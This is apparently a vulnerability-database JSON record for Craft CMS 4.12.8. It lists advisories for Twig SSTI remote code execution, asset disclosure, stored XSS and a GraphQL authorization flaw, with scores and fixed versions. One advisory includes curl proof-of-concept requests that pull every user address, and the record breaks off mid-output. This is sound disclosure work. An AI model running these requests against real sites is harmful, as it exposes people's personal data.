{"url":"http://public2.vulnerablecode.io/api/packages/83232?format=json","purl":"pkg:composer/craftcms/cms@4.12.8","type":"composer","namespace":"craftcms","name":"cms","version":"4.12.8","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"4.17.12","latest_non_vulnerable_version":"5.9.18","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49573?format=json","vulnerability_id":"VCID-1468-4fdx-kbfr","summary":"Craft CMS vulnerable to potential authenticated Remote Code Execution via Twig SSTI\nFor this to work, users must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled for this to work, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nAlternatively, a non-administrator account with allowAdminChanges disabled can be used, provided access to the System Messages utility is available.\n\nIt is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\nReferences:\n\nhttps://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68454","reference_id":"","reference_type":"","scores":[{"value":"0.00499","scoring_system":"epss","scoring_elements":"0.66303","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68454"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68454","reference_id":"CVE-2025-68454","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68454"},{"reference_url":"https://github.com/advisories/GHSA-742x-x762-7383","reference_id":"GHSA-742x-x762-7383","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-742x-x762-7383"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383","reference_id":"GHSA-742x-x762-7383","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73170?format=json","purl":"pkg:composer/craftcms/cms@4.16.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.17"},{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68454","GHSA-742x-x762-7383"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1468-4fdx-kbfr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49572?format=json","vulnerability_id":"VCID-1mb5-28xp-ckd2","summary":"Craft CMS vulnerable to potential information disclosure via unchecked asset relocation\nAuthenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\n Resources:\n\nhttps://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9\n\nhttps://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68436","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1173","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68436"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T15:35:10Z/"}],"url":"https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68436","reference_id":"CVE-2025-68436","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68436"},{"reference_url":"https://github.com/advisories/GHSA-53vf-c43h-j2x9","reference_id":"GHSA-53vf-c43h-j2x9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-53vf-c43h-j2x9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9","reference_id":"GHSA-53vf-c43h-j2x9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T15:35:10Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73170?format=json","purl":"pkg:composer/craftcms/cms@4.16.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.17"},{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68436","GHSA-53vf-c43h-j2x9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1mb5-28xp-ckd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50301?format=json","vulnerability_id":"VCID-39ct-cg7w-kyb6","summary":"Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type\nA stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27126","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01772","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27126"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T19:33:58Z/"}],"url":"https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27126","reference_id":"CVE-2026-27126","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27126"},{"reference_url":"https://github.com/advisories/GHSA-3jh3-prx3-w6wc","reference_id":"GHSA-3jh3-prx3-w6wc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3jh3-prx3-w6wc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc","reference_id":"GHSA-3jh3-prx3-w6wc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T19:33:58Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74189?format=json","purl":"pkg:composer/craftcms/cms@4.16.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.19"},{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27126","GHSA-3jh3-prx3-w6wc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-39ct-cg7w-kyb6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95319?format=json","vulnerability_id":"VCID-41uv-1axm-fugb","summary":"Craft CMS's Missing Authorization in GraphQL Address Resolver Allows Cross-Scope PII Disclosure\n### Summary\n\nThe GraphQL Address element resolver (src/gql/resolvers/elements/Address.php) performs no schema scope filtering on top-level queries. A GraphQL API token scoped to a single low-privilege user group can read every address in the system, including addresses belonging to users in groups the token has no authorization to access. This exposes PII, including full names, addresses, organizations, tax IDs, etc.\n\n### Details\n\nEvery GraphQL element resolver in Craft CMS applies schema scope filtering via `GqlHelper::extractAllowedEntitiesFromSchema()` when handling top-level queries, except the Address resolver.\n\nThe only gate check for addresses is `canQueryUsers()` (`src/gql/queries/Address.php`, line 30), which is a binary check. It returns `true` if the token has access to *any* user group. Once past this gate, no further filtering is applied.\n\n### PoC\n\n**Tested on:** CraftCMS 5.9.17 (fresh Docker install, PHP 8.3)\n**Prerequisites:** A GraphQL API token with read access to any single user group\n\n### Environment\n\n- Two user groups: `publicUsers` (in token scope) and `internalTeam` (NOT in scope)\n- 5 internal executives with corporate addresses (internalTeam)\n- 3 public customers with personal addresses (publicUsers)\n- GQL token scoped to `publicUsers:read` only\n\n**Step 1:** Introspect the schema to discover the `addresses` query is available to this token. Issue the below curl command \n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"Query\\\") { fields { name description } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1641\" height=\"856\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d798b4d2-9965-40fd-8252-ba6b08d1dde9\" />\n\nThe token can see `addresses`, `entries`, `users` as top-level queries.\n\n**Step 2:** Enumerate Address fields to identify PII exposure surface.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"AddressInterface\\\") { fields { name\ntype { name } } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1726\" height=\"862\" alt=\"image\" src=\"https://github.com/user-attachments/assets/31a90b5d-7337-49b9-8802-355f16b7b4f3\" />\n\n> Exposed fields include: `fullName`, `firstName`, `lastName`, `addressLine1/2/3`, `locality`, `postalCode`, `countryCode`, `organization`, `organizationTaxId`, `latitude`, `longitude`.\n> \n\n**Step 3:** Establish baseline -  confirm the token’s user scope is limited. This proves our token only has access to the `publicUsers` group.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\norganizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1626\" height=\"492\" alt=\"image\" src=\"https://github.com/user-attachments/assets/42ec8c3d-d1ae-4eac-9202-af072f394e4a\" />\n\nOnly 5 public users returned. Scope enforcement works correctly for the User resolver — internal executives are NOT visible.\n\n**Step 4:** Query all addresses - the token returns data for ALL user groups, including those outside its authorized scope.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\n  organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"910\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef34e11c-36a8-4582-93e3-04c3e4dad6ab\" />\n\n<img width=\"1444\" height=\"942\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64d6edec-60bf-4481-8a20-7f64c81c015b\" />\n\n\n ▎ \"This token can only see 5 users, but it returns 10 addresses\" as shown in the above 2 screenshot outputs\n\n> **All 10 addresses returned.** The same token that only sees 5 public users now returns addresses for internal executives including corporate tax IDs:\n> \n> - Sarah Chen, 4200 Executive Plaza Dr, SF — Horizon Dynamics Inc. (TaxID: 82-4917263)\n> - James Whitfield, 89 Kensington High St, London — Whitfield Capital Partners LLP (TaxID: GB927461038)\n> - Maria Rossi, 15 Via della Conciliazione, Roma — Rossi & Bianchi Avvocati (TaxID: IT04829173651)\n> - David Nakamura, 2-11-3 Meguro, Tokyo — Nakamura Medical Technologies KK (TaxID: JP8230-4719-2835)\n> - Elena Voronova, 27 Universitätsstrasse, Zurich — Voronova Biotech AG 